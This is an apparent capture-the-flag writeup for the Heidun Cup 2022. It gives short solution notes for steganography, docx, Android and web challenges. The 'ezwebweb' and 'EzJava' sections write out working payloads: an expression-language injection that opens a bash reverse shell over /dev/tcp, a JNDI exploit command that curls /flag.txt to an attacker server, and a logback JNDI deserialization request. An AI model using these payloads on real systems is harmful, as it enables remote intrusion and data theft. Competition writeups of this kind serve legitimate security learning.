# Writeups for 黑盾杯 (Heidun Cup) 2022
## Invisible does not mean absent (看不见不等于没有)
0x20 (space) -> 0
0x09 (tab) -> 1
binary string to bytes -> flag{HeiDunBei888888}
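
The mapping above as a small decoder, added here as an example and not part of the original writeup. It assumes every space or tab byte in the file carries one bit, all other bytes are ignored, and bits are packed MSB first; the sample input is constructed, not the challenge file.

```python
SPACE, TAB = 0x20, 0x09  # mapping from the writeup: 0x20 -> 0, 0x09 -> 1


def extract_bits(data: bytes) -> str:
    """Keep only space/tab bytes and map them to '0'/'1'; ignore everything else."""
    return "".join("0" if b == SPACE else "1" for b in data if b in (SPACE, TAB))


def bits_to_bytes(bits: str) -> bytes:
    """Group bits into octets, MSB first (assumption), dropping a trailing partial octet."""
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def decode_whitespace(data: bytes) -> bytes:
    """Recover the hidden bytes from a whitespace-encoded carrier."""
    return bits_to_bytes(extract_bits(data))


def encode_whitespace(payload: bytes, per_line: int = 8) -> bytes:
    """Inverse mapping, used here only to build the constructed sample."""
    bits = "".join(f"{b:08b}" for b in payload)
    ws = bytes(SPACE if bit == "0" else TAB for bit in bits)
    lines = [ws[i:i + per_line] for i in range(0, len(ws), per_line)]
    return b"\n".join(lines) + b"\n"


# Constructed sample, not the challenge file: "demo{ws}" hidden as spaces and tabs.
SAMPLE = encode_whitespace(b"demo{ws}")

if __name__ == "__main__":
    print(SAMPLE)                     # renders as blank lines in an editor
    print(decode_whitespace(SAMPLE))
```
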
## The word is not the word
doc -> zip
document.xml -> {heyiamherejustinthedocx}
## Black Box (黑匣子)

## HeidunGame
apktool
HeidunGame/smali/com/example/heidungame/data/LoginDataSource.smali
line 37 -> {heidun_game_of_android}
## Do you secure
A race condition is enough.
upload_index.php
## ezwebweb
```
POST /validateBody HTTP/1.1
{"username":"asd","tel":"asd","email":"${''.getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/ip/port<&1')\")}","yourworks":"asd"}
```
## EzJava
```
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl ip:port -File=@/flag.txt' -A "vps ip"
```
```
POST /;/json HTTP/1.1
["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://ip:port/digc0w"}]
```